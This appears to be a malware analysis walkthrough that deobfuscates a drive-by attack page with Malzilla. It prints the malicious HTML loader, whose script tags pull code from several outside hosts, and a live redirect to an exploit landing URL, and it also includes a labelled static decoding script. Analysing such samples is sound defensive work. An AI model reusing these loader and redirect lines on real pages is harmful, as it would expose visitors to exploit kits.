<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script language="JavaScript" type="text/JavaScript" src="hxxp://bobosbouncytown.com/jscript.js"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://dzevents-algerie.com/jscript.js"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://sammy.dommel.be/gogleads.js"></script>
</html>
So let's wget one of these and see what we have:
document.location='http://curvechurch.com/main.php?page=4a4fd3141d846cdd';
Let's wget THAT and see what we have:
Yugh...obfuscated JavaScript...ick. So let's fire up Malzilla and see what we can do. I copied the above into the Decoder tab and hit Debug. I get an error:
aa is not defined
Well that stinks. But I DO get some good info from the Variable State window, so let's change the easy ones:
d="doc";
e='ev';
w=window;
g='fromCharCode';
if(w[d+"ument"])aa=([].unshift+'');
aa=aa.split('').pop();
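Still the same "aa is not defined" error after clicking Debug. The if guard on w[d+"ument"] (that is, window.document) evidently never passes in Malzilla, so aa is never assigned...so let's nuke that if portion to show: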
aa=([].unshift+'');
Now we're hot doggin! Closing the Debug window will give us:
So let's see what that eval_temp file is...open up the temp file in Notepad/WordPad, copy ALL of it, create a new Decoder tab in Malzilla, dump it in and hit Format Code:
Note the rabbit link. Now...there's a LOT of crap going on here...PDF/Java/Flash version checks, to name a few. But what caught my eye was down at the bottom area:
Let's copy all those comma-separated numbers, go to the Misc Decoders tab and paste 'em in. Don't forget to add a comma at the very start of the string. Click the Decode Dec(,) button:
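The same decimal decoding can be done statically outside Malzilla, without evaluating anything from the sample. This is an added example, not part of the original post: the sample string is constructed, the function names are hypothetical, and it assumes the numbers are plain decimal character codes separated by commas.

```javascript
// Added example, not from the original post. Static equivalent of Malzilla's
// "Decode Dec(,)" step: nothing from the sample is evaluated.

// Constructed sample input (not the script analysed above).
const SAMPLE =
  'var z=[104,116,116,112,58,47,47,101,120,97,109,112,108,101,46,105,110,' +
  '118,97,108,105,100,47,97];var q=[1,2];';

// Collect runs of comma-separated decimals; short runs are usually ordinary
// array literals, so anything under minLen values is skipped.
function findDecimalRuns(source, minLen = 8) {
  const runs = [];
  for (const m of source.matchAll(/\d+(?:\s*,\s*\d+)+/g)) {
    const nums = m[0].split(',').map((n) => parseInt(n.trim(), 10));
    if (nums.length >= minLen) runs.push(nums);
  }
  return runs;
}

// Turn one run into text. Values that cannot be a UTF-16 code unit are
// returned separately instead of being silently wrapped by fromCharCode.
function decodeRun(nums) {
  const outOfRange = nums.filter((n) => n > 0xffff);
  const text = nums
    .filter((n) => n <= 0xffff)
    .map((n) => String.fromCharCode(n))
    .join('');
  return { text, outOfRange };
}

// Make decoded text safe to paste into notes: escape non-printable characters
// and defang URL schemes the same way the post does (hxxp).
function defang(text) {
  return text
    .replace(/[^\x20-\x7e]/g, (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'))
    .replace(/http/gi, 'hxxp');
}

// Decode every qualifying run found in a script and return the results.
function triage(source) {
  return findDecimalRuns(source).map((nums) => {
    const { text, outOfRange } = decodeRun(nums);
    return { count: nums.length, text: defang(text), outOfRange };
  });
}

console.log(triage(SAMPLE));
```

Unlike the Malzilla button, this does not need the leading comma, because the pattern starts matching at the first digit.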
Vicheck and Virustotal don't show much...scary:
http://www.virustotal.com/file-scan/report.html?id=453b83d472e378cb306ae282ebeb51765545892637bd087aa2a916df1a3fb934-1324483480
https://www.vicheck.ca/md5query.php?hash=559ccdd2ae813251d28cf6ab15195fff